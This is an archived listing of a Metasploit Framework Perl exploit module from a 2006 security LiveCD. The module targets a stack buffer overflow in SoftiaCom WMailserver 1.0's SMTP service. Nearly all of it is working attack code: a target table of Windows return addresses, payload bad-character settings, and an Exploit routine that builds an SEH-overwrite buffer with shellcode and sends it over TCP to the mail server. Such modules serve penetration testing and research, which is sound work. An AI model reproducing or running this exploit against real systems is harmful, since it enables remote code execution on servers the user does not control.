home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / wmailserver_smtp.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  107 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::wmailserver_smtp;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'     => 'SoftiaCom WMailserver 1.0 SMTP Buffer Overflow',
  21.     'Version'  => '$Revision: 1.1 $',
  22.     'Authors'  => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp' ],
  25.     'Priv'  => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 25],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'thread' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 600,
  36.         'BadChars'  => "\x00\x0a\x0d\x20:=+\x22",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.     This module exploits a stack overflow in SoftiaCom WMailserver 1.0 (SMTP)
  43.     via a SEH frame overwrite.
  44. }),
  45.  
  46.     'Refs'  =>
  47.       [
  48.         ['CVE', 'CAN-2005-2287'],
  49.         ['BID', '14213'],
  50.       ],
  51.     'Targets' =>
  52.       [
  53.         ['Windows NT 4.0 English SP4/SP5/SP6', 0x776a1799],
  54.         ['Windows 2000 English ALL', 0x75022ac4],
  55.         ['Windows XP English SP0/SP1', 0x71aa32ad],
  56.       ],
  57.     'Keys' => ['smtp'],
  58.   };
  59.  
  60. sub new {
  61.     my $class = shift;
  62.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  63.     return($self);
  64. }
  65.  
  66. sub Exploit
  67. {
  68.     my $self = shift;
  69.     my $target_host = $self->GetVar('RHOST');
  70.     my $target_port = $self->GetVar('RPORT');
  71.     my $target_idx  = $self->GetVar('TARGET');
  72.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  73.     my $target = $self->Targets->[$target_idx];
  74.  
  75.     if (! $self->InitNops(128)) {
  76.         $self->PrintLine("[*] Failed to initialize the nop module.");
  77.         return;
  78.     }
  79.  
  80.     my $splat  = Pex::Text::UpperCaseText(5117);
  81.  
  82.     my $sploit =
  83.       " ". $splat. "\xeb\x06". pack('V', $target->[1]).
  84.       $shellcode. "\r\n\r\n";
  85.  
  86.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  87.  
  88.     my $s = Msf::Socket::Tcp->new
  89.       (
  90.         'PeerAddr'  => $target_host,
  91.         'PeerPort'  => $target_port,
  92.         'LocalPort' => $self->GetVar('CPORT'),
  93.         'SSL'       => $self->GetVar('SSL'),
  94.       );
  95.     if ($s->IsError) {
  96.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  97.         return;
  98.     }
  99.  
  100.     $s->Send($sploit);
  101.     $self->Handler($s);
  102.     $s->Close();
  103.     return;
  104. }
  105.  
  106. 1;
  107.